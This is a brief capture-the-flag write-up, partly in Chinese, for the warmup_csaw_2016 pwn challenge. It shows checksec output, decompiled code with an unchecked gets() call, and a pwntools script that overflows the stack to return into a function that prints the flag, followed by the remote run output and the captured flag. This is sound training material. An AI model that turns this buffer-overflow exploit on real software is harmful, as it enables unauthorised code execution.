warmup_csaw_2016
- 1.file
root@kali:~/Downloads# file warmup_csaw_2016
warmup_csaw_2016: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=7b7d75c51503566eb1203781298d9f0355a66bd3, stripped
64位程序
- 2.checksec
root@kali:~/Downloads# checksec warmup_csaw_2016
[*] '/root/Downloads/warmup_csaw_2016'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE
无保护
- 3.IDA
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
char s; // [rsp+0h] [rbp-80h]
char v5; // [rsp+40h] [rbp-40h]
write(1, "-Warm Up-
", 0xAuLL);
write(1, "WOW:", 4uLL);
sprintf(&s, "%p
", sub_40060D);
write(1, &s, 9uLL);
write(1, ">", 1uLL);
return gets(&v5, ">");
}
运行结果
root@kali:~/Downloads# ./warmup_csaw_2016
-Warm Up-
WOW:0x40060d
>12
查看 sub_40060D
int sub_40060D()
{
return system("cat flag.txt");
}
可利用这个函数
构造exp
#!/usr/bin/python3
#coding=utf-8
from pwn import *
port = 25397
p = remote('node3.buuoj.cn',port)
payload = b'a'*0x40 + b'b'*8 + p64(0x40060d)
p.sendline(payload)
p.interactive()
exp 运行结果
root@kali:~/Downloads# python3 exp_warmup_csaw_2016.py
[+] Opening connection to node3.buuoj.cn on port 25397: Done
[*] Switching to interactive mode
-Warm Up-
WOW:0x40060d
>flag{7fe33307-500a-42af-a7a6-b9a039f20b8f}
timeout: the monitored command dumped core
[*] Got EOF while reading in interactive
$
以上为个人做题思路欢迎大家讨论学习。